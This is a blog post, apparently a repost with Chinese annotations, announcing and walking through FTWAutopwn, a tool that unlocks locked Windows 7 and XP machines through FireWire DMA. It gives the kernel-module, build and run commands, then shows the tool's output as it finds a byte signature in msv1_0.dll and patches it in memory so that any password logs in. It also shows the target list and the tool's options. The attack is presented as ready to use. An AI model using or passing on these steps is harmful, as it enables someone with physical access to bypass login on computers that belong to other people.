The last days I’ve been working on an alternative to winlockpwn(unlockinglocked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I’vereleased an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn)
atgithub. So here’s how to use it:
Check that your distro uses the new IEEE1394 stack 如果机器没有1394就别玩了
$ ls /dev | grep fw
插曲:通过lsmod | grep 1394 命令可以查看加载项
If the new stack is loaded and the system has at least one FireWire port then `fw0`should be printed. Additional ports/devices will take the form fw<n>. If no devices are listed then it is likely that the new stack is not loaded.
That sucks, try this command if you’re running Debian/Ubuntu:
$ sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394
$ sudo modprobe firewire-ohci
modprobe
功能说明:自动处理可载入模块。
参数
-a或--all 载入全部的模块。
-c或--show-conf 显示所有模块的设置信息。
-d或--debug 使用排错模式。
-l或--list 显示可用的模块。
-r或--remove 模块闲置不用时,即自动卸载模块。
-t或--type 指定模块类型。
-v或--verbose 执行时显示详细的信息。
-V或--version 显示版本信息。
-help 显示帮助。
Download and install libforensic1394
sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz
(you can also get
libforensic1394-0.2.tar.gz at : http://download.csdn.net/source/3573898)
tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G "Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install
(if you don't have cmake or your cmake version is too old and occures error ,please read another article : http://blog.csdn.net/wangjiannuaa/article/details/6747042 ; and , your default python perhaps not version3 , you can type
the command : apt-get install python3-minimal)
Download and use FTWAutopwn
cd
git clone https://github.com/carmaa/FTWAutopwn.git
cd FTWAutopwn
python3 ftwautopwn.py
注:不一定用git,可以直接去网站下载:https://github.com/carmaa/FTWAutopwn
如果报错是环境变量问题。cannot open shared object file:No such file or dir....
把安装的libforensic1394的lib目录添加进来:export LD_LIBRARY_PATH=/xxx/xxx/lib/xxx(发现不了那个文件的实际目录)
The last command should now work. Hook up your attacking machine to alocked Windows 7 or XP machine using IEEE1394 FireWire cable, and run the above command. Select the correct target, and you’re off!
$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe<carsten@carmaa.com> 2011
For updates, check outhttps://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Win7 32-bit msv1_0.dll technique
[2] Win7 64-bit msv1_0.dll technique
[3] WinXP SP2 msv1_0.dll technique
[4] WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dlltechnique
Using signature: 83f8107511b0018b
Using patch: 83f8109090b0018b
Using offset: 2146
[+] Searching for signature, 12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patchingsuccessful. Bon voyage!
You should now be able to log onto your target machine with any password.
Full syntax is provided by using the -h/–help switch:
$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe<carsten@carmaa.com> 2011
For updates, check outhttps://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]
-d --delay=TIME: Delay attackby TIME seconds. This is useful in order
to guarantee that thetarget machine has successfully
installed the SBP2device before attacking. If the
attack fails, try toincrease this value.
-f --file=FILE: Use a fileinstead of FireWire bus data as input; for
example to facilitateattacks on VMware machines or
to ease testing andsignature generation efforts
-h, --help: Displays this message
-l, --list: Listsavailable target operating systems
-n, --no-write: Dry run, donot write back to memory
-t TARGET, --target=TARGET:
Specify targetoperating system (use --list to list
available targets)
-v/--verbose: Verbose mode